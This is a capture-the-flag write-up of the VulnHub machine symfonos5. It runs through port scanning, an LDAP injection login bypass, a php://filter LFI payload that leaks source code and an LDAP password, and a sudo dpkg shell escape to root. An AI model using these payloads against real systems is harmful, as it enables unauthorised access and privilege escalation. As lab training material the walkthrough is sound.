Now back to the series of symfonos seems we are almost done let jump back to it has always.
We always start with an nmap scan…..
nmap -p- -sC -sV -oN nmap/full.tcp 172.16.109.166
# Nmap 7.91 scan initiated Thu Mar 10 08:01:18 2022 as: nmap -p- -sC -sV -oN nmap/full.tcp 172.16.109.166
Nmap scan report for 172.16.109.166
Host is up (0.012s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
| 256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
|_ 256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
636/tcp open ldapssl?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 10 08:01:34 2022 -- 1 IP address (1 host up) scanned in 15.98 seconds
Interesting we just have 4 open ports which seems cool let start with low hanging fruit first which is ldap .
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/symfonos5]
└─$ ldapsearch -x -h 172.16.109.166 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: dc=symfonos,dc=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Interesting now that we have the namingcontexts let move forward.
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/symfonos5]
└─$ ldapsearch -x -h 172.16.109.166 -b "dc=symfonos,dc=local"
# extended LDIF
#
# LDAPv3
# base <dc=symfonos,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 32 No such object
# numResponses: 1
Now that is a deadend seems we need a credentials to access the ldap without wasting to much of time let move forward.
80 HTTP
Just a plain page with zeus background checking the source but got nothing time to Fuzz it.
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/symfonos5]
└─$ ffuf -ic -c -u http://172.16.109.166/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e .php,.html,.txt -o ffuf.dirb
Now that admin.php look promising let check what we have on it.
Now that is a login page try some credentials like admin/password and sql injection also but no luck but still one seems we have ldap why not try ldap injection also.
Ldap Injection
The payload am using is * for username and * for password.
Boom we are in time to look around to see what we can get.
Possible RFI/LFI hehehehe let try RFI first.
Now that is strange we are just getting part of the shell.php file back but we are getting the file it was confirm below.
Now back to LFI exploiting.
Now we are talking so far i try ssh log poisoning, pache log poisoning we have no luck now try reading the page source with the php wrapper payload.
http://172.16.109.166/home.php?url=php://filter/convert.base64-encode/resource=home.php
Now let decode the base64 and see the source code.
Nah… nothing let check the admin.php now.
http://172.16.109.166/home.php?url=php://filter/convert.base64-encode/resource=admin.php
Now we have credentials for ldap back to it.
ldapsearch -h 172.16.109.166 -D 'cn=admin,dc=symfonos,dc=local' -w 'qMDdyZh3cT6eeAWD' -s base namingcontexts
ldapsearch -h 172.16.109.166 -D 'cn=admin,dc=symfonos,dc=local' -w 'qMDdyZh3cT6eeAWD' -b "dc=symfonos,dc=local"
Now seems we find a way encoded in base64 let decode it.
Now try it on SSH with the user zeus .
Boom we are in and seems we can run sudo with /usr/bin/dpkg now let jump to gtfobins .
sudo /usr/bin/dpkg -l
Now let type !sh to drop into root shell.
We are done.
Greeting From Muzec